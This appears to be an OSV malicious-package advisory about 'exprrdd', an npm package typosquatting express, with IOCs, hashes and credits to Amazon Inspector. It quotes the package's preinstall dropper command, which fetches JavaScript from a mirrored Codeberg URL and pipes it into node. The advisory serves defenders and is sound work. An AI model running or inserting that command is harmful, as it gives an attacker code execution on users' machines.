{"id":"MAL-2026-17244","summary":"Malicious code in exprrdd (npm)","details":"The package exprrdd impersonates the legitimate 'express' package (it republishes express's package metadata and code) and adds a malicious preinstall hook that runs automatically on npm install, before any dependency is installed: `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`. The hook downloads a remote JavaScript second stage from a Wayback Machine mirror of a Codeberg repository (hellscripter/install-scripts) and pipes it directly into node, giving the attacker arbitrary code execution on the installing machine. Version 5.2.1 was published on 2026-09-29. It is one of nine packages published within about 33 minutes by the npm account 'dirtyblanket' (maintainer email s7dwzxru4z@ooynib.com), all carrying the identical preinstall hook: xeprews, express-javascript, express-nodejs, react-nodejs, exprdd, exprrdd, exptrdd, exptred, exptredd.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (bc1c956097cd13e80298a796a5026ebd91ece7c2ad53d226d3729f0b0b0ee9f3)\nPackage 'exprrdd' copies express's metadata (name-lookalike, description, author, contributors, repository, keywords, dependencies) as cover for a preinstall dropper. package.json line 98 declares a preinstall script that runs `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js` and pipes the response directly into `node`, executing attacker-controlled JavaScript on the installer's machine at `npm install` time. The fetched script is unpinned and mutable (a raw branch URL fronted by a web.archive.org rewrite), so whoever controls the codeberg.org/hellscripter repository gains arbitrary code execution on every host that installs this package. The typosquat name maximizes accidental installs by developers mistyping 'express'.\n","modified":"2026-10-01T05:30:06.395822879Z","published":"2026-09-29T07:12:49Z","database_specific":{"iocs":{"urls":["https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js","https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js"]},"malicious-packages-origins":[{"source":"amazon-inspector","versions":["5.2.1"],"id":"IN-MAL-2026-020629","import_time":"2026-09-29T14:44:37.259630412Z","modified_time":"2026-09-29T14:39:55Z","sha256":"bc1c956097cd13e80298a796a5026ebd91ece7c2ad53d226d3729f0b0b0ee9f3"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/exprrdd/v/5.2.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/exprrdd"}],"affected":[{"package":{"name":"exprrdd","ecosystem":"npm","purl":"pkg:npm/exprrdd"},"versions":["5.2.1"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"path":"package.json","sha256":"b8db5a768396796ff638ce0e6d6247d9073a87cde72132f9622cad4934a9da0d","tlsh":"8551da21cc0e8c6326c5a2dd3c69a542612188078e41f81cf769539c8f8e52f71b9fbf"}],"package_integrity":[{"filename":"exprrdd-5.2.1.tgz","hashes":{"sha512_sri":"sha512-EPTt+ld6E+zZo4gtezupKHXgTKcGRXgpUGRoRguzhQTFiXo7HWU0ESqePWK9R//5Q3b1gJGkcDNDJMEzwD4NAw==","sha1":"8e492767d36374a96562bd3ddf7679da37d4468e"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exprrdd/MAL-2026-17244.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Pranesh, InvisiRisk","type":"FINDER"}]}